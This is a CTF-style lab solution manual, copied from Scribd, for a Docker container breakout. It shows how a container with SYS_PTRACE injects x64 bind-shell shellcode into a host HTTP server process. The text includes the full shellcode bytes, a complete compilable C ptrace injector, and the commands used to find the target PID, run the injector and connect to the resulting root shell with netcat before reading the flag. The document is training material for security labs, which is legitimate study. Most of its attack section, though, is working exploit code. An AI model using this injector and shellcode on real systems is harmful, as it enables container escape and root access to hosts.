Scribd
Upload
7 views

Process Injection Lab Manual

Uploaded by

gustavopiza94
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
7 views

Process Injection Lab Manual

Uploaded by

gustavopiza94
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 11

Name Process Injection

URL https://attackdefense.com/challengedetails?cid=1198

Type DevSecOps : Docker Breakouts

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Objective: ​Break out of the container by performing process injection on the HTTP server
running on the underlying host machine and retrieve the flag kept in the root directory of the
host system!

Solution:

Step 1: ​Check the capabilities provided to the docker container.

Command: ​capsh --print

The container has SYS_PTRACE capability. As a result, the container can debug processes.

Step 2: ​Identify the PID of the http server.

Command: ​ps -eaf


Python HTTP Server is running on the host machine, the PID of the HTTP server is 221.

Step 3: ​Check the architecture of the host machine.

Command: ​uname -m
The host machine is running 64 bit Linux.

Step 4: ​Search for publicly available TCP BIND shell shellcodes.

Search on Google “Linux x64 Bind shell shellcode exploit db”.

The second Exploit DB link contains a BIND shell shellcode of 87 bytes.

Exploit DB Link: ​https://www.exploit-db.com/exploits/41128


Shellcode:
"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02
\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x
0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x4
8\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";

The above shell code will trigger a BIND TCP Shell on port 5600.

Step 5: ​Write a program to inject BIND TCP shellcode into the running process.

The C program provided at the GitHub Link given below can be used to inject shellcode into a
running process.

GitHub Link: ​https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c

The shellcode used in the above referenced C program will trigger a shell on the running
process. Replace the shellcode with the shellcode provided at the exploit db link referenced in
step 4.

Modified Program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <sys/user.h>
#include <sys/reg.h>
#define SHELLCODE_SIZE 87

unsigned char *shellcode =


"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\
x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\
x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\
x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";

int inject_data (pid_t pid, unsigned char *src, void *dst, int len)
{
int i;
uint32_t *s = (uint32_t *) src;
uint32_t *d = (uint32_t *) dst;

for (i = 0; i < len; i+=4, s++, d++)


{
if ((ptrace (PTRACE_POKETEXT, pid, d, *s)) < 0)
{
perror ("ptrace(POKETEXT):");
return -1;
}
}
return 0;
}

int
main (int argc, char *argv[])
{
pid_t target;
struct user_regs_struct regs;
int syscall;
long dst;

if (argc != 2)
{
fprintf (stderr, "Usage:\n\t%s pid\n", argv[0]);
exit (1);
}
target = atoi (argv[1]);
printf ("+ Tracing process %d\n", target);

if ((ptrace (PTRACE_ATTACH, target, NULL, NULL)) < 0)


{
perror ("ptrace(ATTACH):");
exit (1);
}

printf ("+ Waiting for process...\n");


wait (NULL);

printf ("+ Getting Registers\n");

if ((ptrace (PTRACE_GETREGS, target, NULL, &regs)) < 0)


{
perror ("ptrace(GETREGS):");
exit (1);
}

/* Inject code into current RPI position */

printf ("+ Injecting shell code at %p\n", (void*)regs.rip);


inject_data (target, shellcode, (void*)regs.rip, SHELLCODE_SIZE);

regs.rip += 2;
printf ("+ Setting instruction pointer to %p\n", (void*)regs.rip);

if ((ptrace (PTRACE_SETREGS, target, NULL, &regs)) < 0)


{
perror ("ptrace(GETREGS):");
exit (1);
}
printf ("+ Run it!\n");

if ((ptrace (PTRACE_DETACH, target, NULL, NULL)) < 0)


{
perror ("ptrace(DETACH):");
exit (1);
}
return 0;

Save the above program as “inject.c”


Command: ​cat inject.c
Step 6: ​Compile the program.

Command: ​gcc inject.c -o inject

Step 7: ​Execute the binary and pass it PID of HTTP server as an argument.

Command: ​./inject 221


Step 8: ​Find the IP address of the host machine.

Command: ​ifconfig

The IP address of the docker container was 172.17.0.2, therefore the host machine will have IP
address 172.17.0.1

Step 9: ​Connect to the BIND shell with netcat and check the user id.

Commands:
nc 172.17.0.1 5600
id
Step 10: ​Retrieve the flag.

Commands:
find / -name flag 2>/dev/null
cat /root/flag

Flag: ​d8d38cda23b69585710698421c946e2b

References:

1. Docker (​​https://www.docker.com/​​)
2. Linux/x64 - Bind (5600/TCP) Shell Shellcode (87 bytes)
(​https://www.exploit-db.com/exploits/41128​)
3. Mem Inject (​https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c​)

You might also like